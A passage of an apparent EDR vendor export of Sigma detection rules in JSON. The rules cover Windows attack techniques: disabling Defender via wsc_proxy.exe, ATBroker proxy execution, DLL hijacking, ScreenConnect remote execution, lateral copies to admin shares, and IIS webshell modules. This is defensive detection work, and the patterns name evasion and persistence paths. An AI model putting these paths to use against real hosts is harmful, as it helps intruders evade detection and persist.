"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072839Z",
"creation_date": "2026-03-23T11:45:34.072841Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072845Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/es3n1n/no-defender",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_defender_disabled_via_wsc_proxy.yml",
"content": "title: Windows Defender Disabled via wsc_proxy.exe\nid: 9afca8ef-febf-42db-9ff5-b82567cb4c5b\ndescription: |\n Detects execution of wsc_proxy.exe, a binary associated with the Avast and AVG antiviruses, from a suspicious location.\n This binary is a tool to communicate with the WSC (Windows Security Center) service.\n WSC is a service in Windows used by antiviruses to tell the operating system that another antivirus is running and that it should disable Windows Defender.\n Attackers may abuse this legitimate wsc_proxy.exe binary to disable Windows Defender on the host.\n It is recommended to look at the service that ran the wsc_proxy.exe binary to determine its legitimacy and to look for the execution of suspicious binaries before this alert which may be responsible for the creation of this service.\nreferences:\n - https://github.com/es3n1n/no-defender\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/05/24\nmodified: 2026/01/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.WscProxy\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'wsc_proxy.exe'\n Signed: 'true'\n Signature:\n - 'Avast Software s.r.o.'\n - 'AVG Technologies USA, LLC'\n\n filter_legitimate:\n Image:\n - '?:\\Program Files\\AVAST Software\\Avast\\wsc_proxy.exe'\n - '?:\\Program Files\\AVAST Software\\Avast Business\\wsc_proxy.exe'\n - '?:\\Program Files\\AVG\\Antivirus\\wsc_proxy.exe'\n - '?:\\Program Files\\Avast Software\\Suite\\wsc_proxy.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9afca8ef-febf-42db-9ff5-b82567cb4c5b",
"rule_name": "Windows Defender Disabled via wsc_proxy.exe",
"rule_description": "Detects execution of wsc_proxy.exe, a binary associated with the Avast and AVG antiviruses, from a suspicious location.\nThis binary is a tool to communicate with the WSC (Windows Security Center) service.\nWSC is a service in Windows used by antiviruses to tell the operating system that another antivirus is running and that it should disable Windows Defender.\nAttackers may abuse this legitimate wsc_proxy.exe binary to disable Windows Defender on the host.\nIt is recommended to look at the service that ran the wsc_proxy.exe binary to determine its legitimacy and to look for the execution of suspicious binaries before this alert which may be responsible for the creation of this service.\n",
"rule_creation_date": "2024-05-24",
"rule_modified_date": "2026-01-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9b1099db-e836-479a-bc60-dbbf9123fade",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079608Z",
"creation_date": "2026-03-23T11:45:34.079609Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079614Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Atbroker/",
"https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_atbroker_registry.yml",
"content": "title: Suspicious Registry Changes Related to ATBroker Proxy Execution\nid: 9b1099db-e836-479a-bc60-dbbf9123fade\ndescription: |\n Detects a registry change related to ATBroker, possibly to proxy execution of malicious code.\n ATBroker executes code defined in registry for a new Assistive Technology (AT). Modifications must be made to the system registry to either register or modify an existing AT service entry.\n Attackers can use this technique to execute malicious code through Microsoft-signed binaries.\n It is recommended to investigate the process that set the registry value for suspicious activities as well as to look for other suspicious actions stemming from an AtBroker process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/\n - https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/08\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.LOLBin.Atbroker\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\\\*\\StartExe'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\\\*\\ATExe'\n\n filter_legitimate_atexe:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\\\*\\ATExe'\n Details:\n - 'EoaExperiences.exe'\n - 'Magnify.exe'\n - 'Narrator.exe'\n - 'osk.exe'\n - 'sapisvr.exe'\n - 'VoiceAccess.exe'\n\n filter_legitimate_startexe:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\\\*\\StartExe'\n Details:\n - '%SystemRoot%\\System32\\EoaExperiences.exe'\n - '%SystemRoot%\\System32\\Magnify.exe'\n - '%SystemRoot%\\System32\\Narrator.exe'\n - '%SystemRoot%\\System32\\osk.exe'\n - '%SystemRoot%\\speech\\common\\sapisvr.exe'\n - '?'\n - '??'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_msiexec:\n - ProcessImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n Details|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - ProcessParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n Details|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - ProcessParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Windows\\Installer\\MSI????.tmp'\n\n exclusion_oracle:\n - Details:\n - '?:\\Program Files\\Java\\j*\\bin\\jabswitch.exe'\n - '?:\\Program Files (x86)\\Java\\j*\\bin\\jabswitch.exe'\n - ProcessSigned: 'true'\n ProcessSignature: 'Oracle America, Inc.'\n - ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\Oracle_JavaAccessBridge\\StartExe'\n Details|endswith: '\\jabswitch.exe'\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n exclusion_nvda:\n ProcessProcessName: 'nvda_slave.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NV Access Limited'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9b1099db-e836-479a-bc60-dbbf9123fade",
"rule_name": "Suspicious Registry Changes Related to ATBroker Proxy Execution",
"rule_description": "Detects a registry change related to ATBroker, possibly to proxy execution of malicious code.\nATBroker executes code defined in registry for a new Assistive Technology (AT). Modifications must be made to the system registry to either register or modify an existing AT service entry.\nAttackers can use this technique to execute malicious code through Microsoft-signed binaries.\nIt is recommended to investigate the process that set the registry value for suspicious activities as well as to look for other suspicious actions stemming from an AtBroker process.\n",
"rule_creation_date": "2022-12-08",
"rule_modified_date": "2025-11-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9b1d8e53-2b21-4190-a2b0-6cab2f93d044",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590428Z",
"creation_date": "2026-03-23T11:45:34.590431Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590439Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wpr.yml",
"content": "title: DLL Hijacking via wpr.exe\nid: 9b1d8e53-2b21-4190-a2b0-6cab2f93d044\ndescription: |\n Detects potential Windows DLL Hijacking via wpr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wpr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WindowsPerformanceRecorderControl.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9b1d8e53-2b21-4190-a2b0-6cab2f93d044",
"rule_name": "DLL Hijacking via wpr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wpr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9b59b325-f5e2-4124-98bd-81e4a9c066a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603928Z",
"creation_date": "2026-03-23T11:45:34.603931Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603939Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
"https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_screenconnect_process_execution.yml",
"content": "title: Process Executed via ScreenConnect\nid: 9b59b325-f5e2-4124-98bd-81e4a9c066a8\ndescription: |\n Detects the execution of a process through ScreenConnect, a legitimate remote access tool.\n Attackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\n - https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2023/11/10\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.ScreenConnect\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine|contains: '\\ScreenConnect.WindowsClient.exe RunFile '\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9b59b325-f5e2-4124-98bd-81e4a9c066a8",
"rule_name": "Process Executed via ScreenConnect",
"rule_description": "Detects the execution of a process through ScreenConnect, a legitimate remote access tool.\nAttackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\nIt is recommended to investigate the process to determine its legitimacy.\n",
"rule_creation_date": "2023-11-10",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9b676aee-d3a6-4f3e-9ee4-8b7f3c9bfdb8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076614Z",
"creation_date": "2026-03-23T11:45:34.076616Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076620Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1570/"
],
"name": "t1570_file_move_admin_share.yml",
"content": "title: Suspicious File Copy to an Administrative Share\nid: 9b676aee-d3a6-4f3e-9ee4-8b7f3c9bfdb8\ndescription: |\n Detects file copies to a default hidden SMB administrative share (C$, ADMIN$ and IPC$).\n This technique can be used by attackers to copy malicious programs to another machine as a mean of moving laterally.\n It is recommended to analyze process responsible for moving the files and the files themselves, to determine if they contain malicious tools or indicators.\nreferences:\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1570/\ndate: 2023/02/22\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1570\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith:\n - '\\xcopy.exe'\n - '\\robocopy.exe'\n # Renamed binaries\n - OriginalFileName:\n - 'xcopy.exe'\n - 'robocopy.exe'\n\n selection_cmdline:\n # Shell primitive, no image.\n CommandLine|contains:\n - ' copy '\n - ' move '\n - ' mv '\n\n selection_smb_share:\n CommandLine|contains:\n # C$ share is the C drive.\n - '\\\\\\\\*\\C$\\Windows'\n - '\\\\\\\\*\\C$\\Users'\n # ADMIN$ share is the %SystemRoot% directory.\n - '\\\\\\\\*\\ADMIN$\\'\n # IPC$ is a share to expose named pipes. A copy to this should be suspicious in itself.\n - '\\\\\\\\*\\IPC$'\n\n exclusion_xpertwin:\n CommandLine|startswith: 'xcopy.exe ????$\\Windows\\xpertwin.ini'\n\n exclusion_netlogon_logs:\n CommandLine|startswith: 'xcopy *\\c$\\windows\\debug\\netlogon.\\**'\n\n exclusion_logs:\n CommandLine|endswith: '.log' # Log files ending with \".log\" extension\n\n exclusion_reader:\n # Avoid false positive with filename that match \"selection_cmdline\"\n Image:\n - '?:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\EXCEL.EXE'\n\n exclusion_teracopy:\n Image: '?:\\Program Files\\TeraCopy\\TeraCopy.exe'\n\n exclusion_robocopy:\n ProcessOriginalFileName: 'robocopy.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: (selection_bin or selection_cmdline) and selection_smb_share and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9b676aee-d3a6-4f3e-9ee4-8b7f3c9bfdb8",
"rule_name": "Suspicious File Copy to an Administrative Share",
"rule_description": "Detects file copies to a default hidden SMB administrative share (C$, ADMIN$ and IPC$).\nThis technique can be used by attackers to copy malicious programs to another machine as a mean of moving laterally.\nIt is recommended to analyze process responsible for moving the files and the files themselves, to determine if they contain malicious tools or indicators.\n",
"rule_creation_date": "2023-02-22",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9ba2245e-e5dd-4b2a-9413-0bc8080755cf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089741Z",
"creation_date": "2026-03-23T11:45:34.089744Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089748Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe",
"https://learn.microsoft.com/en-us/iis/configuration/system.webserver/globalmodules/add#appcmdexe",
"https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/",
"https://attack.mitre.org/techniques/T1505/004/"
],
"name": "t1505_004_iis_module_appcmd_install.yml",
"content": "title: Suspicious IIS Module Addition via appcmd\nid: 9ba2245e-e5dd-4b2a-9413-0bc8080755cf\ndescription: |\n Detects the suspicious addition of an IIS module via 'appcmd.exe' command, out of known usual contexts.\n IIS modules can be integrated into the IIS server to provide additional server functionalities.\n They are also leveraged by malicious actors as persistent webshells, but must first be deployed using integration commands or scripts.\n It is recommended to list modules that are loaded by IIS ('appcmd.exe list modules') as to check for unknown ones and analyze them.\nreferences:\n - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe\n - https://learn.microsoft.com/en-us/iis/configuration/system.webserver/globalmodules/add#appcmdexe\n - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n - https://attack.mitre.org/techniques/T1505/004/\ndate: 2023/11/24\nmodified: 2025/09/26\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'appcmd.exe'\n CommandLine|re:\n - '(?i)\\b(?:install|add)\\s+module\\s+'\n - '(?i)\\bset\\s+config\\s+-section:system\\.webServer/(?:globalModules|modules)\\s+'\n\n filter_parent:\n - ParentImage:\n - '?:\\Windows\\sys*\\msiexec.exe'\n - '?:\\Windows\\system32\\inetsrv\\iissetup.exe'\n - '?:\\Program Files\\Microsoft Configuration Manager\\bin\\x64\\smsexec.exe'\n - '*\\SMS\\bin\\i386\\smsexec.exe'\n - '*\\ExSetup.exe'\n - '*\\ExSetupUI.exe'\n - GrandparentImage:\n - '?:\\Windows\\sys*\\msiexec.exe'\n - '?:\\Windows\\system32\\inetsrv\\iissetup.exe'\n - '?:\\Program Files\\Microsoft Configuration Manager\\bin\\x64\\smsexec.exe'\n - '*\\SMS\\bin\\i386\\smsexec.exe'\n - '*\\ExSetup.exe'\n - '*\\ExSetupUI.exe'\n\n filter_legitimate_modules:\n CommandLine|contains:\n - '/name:SCCMDeviceCertAuthModule /add:true /image:*\\SMS_CCM\\DeviceCertAuthModule.dll'\n - '/name:SCCMDeviceCertAuthModule /add:true /image:*\\CCM\\DeviceCertAuthModule.dll'\n - '/name:SCCMContentAuthModule /add:true /image:?:\\Windows\\System32\\inetsrv\\ContentAuthModule.dll'\n - '/name:AspNetCoreModuleV2 /image:%IIS_BIN%\\Asp.Net Core Module\\V2\\aspnetcorev2.dll'\n - '/name:AspNetCoreModule /image:%IIS_BIN%\\aspnetcore.dll'\n - '/image:?:\\Synapse\\OSD\\NativeModules\\\\*.dll /commit:appHost'\n\n exclusion_ge_dakota:\n ParentImage: '?:\\Program Files\\GE Healthcare\\GE*\\DakotaConfig.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'General Electric Company'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nfalsepositives:\n - Some custom deployment scripts or binaries can legitimately leverage appcmd to install unusual IIS modules.\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9ba2245e-e5dd-4b2a-9413-0bc8080755cf",
"rule_name": "Suspicious IIS Module Addition via appcmd",
"rule_description": "Detects the suspicious addition of an IIS module via 'appcmd.exe' command, out of known usual contexts.\nIIS modules can be integrated into the IIS server to provide additional server functionalities.\nThey are also leveraged by malicious actors as persistent webshells, but must first be deployed using integration commands or scripts.\nIt is recommended to list modules that are loaded by IIS ('appcmd.exe list modules') as to check for unknown ones and analyze them.\n",
"rule_creation_date": "2023-11-24",
"rule_modified_date": "2025-09-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1505.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9bd41fa6-1686-4e56-9acb-9d309bc02843",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093528Z",
"creation_date": "2026-03-23T11:45:34.093530Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093534Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gpapi.yml",
"content": "title: DLL Hijacking via gpap.exe\nid: 9bd41fa6-1686-4e56-9acb-9d309bc02843\ndescription: |\n Detects potential Windows DLL Hijacking via gpap.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpapi.exe'\n ImageLoaded|endswith: '\\gpapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
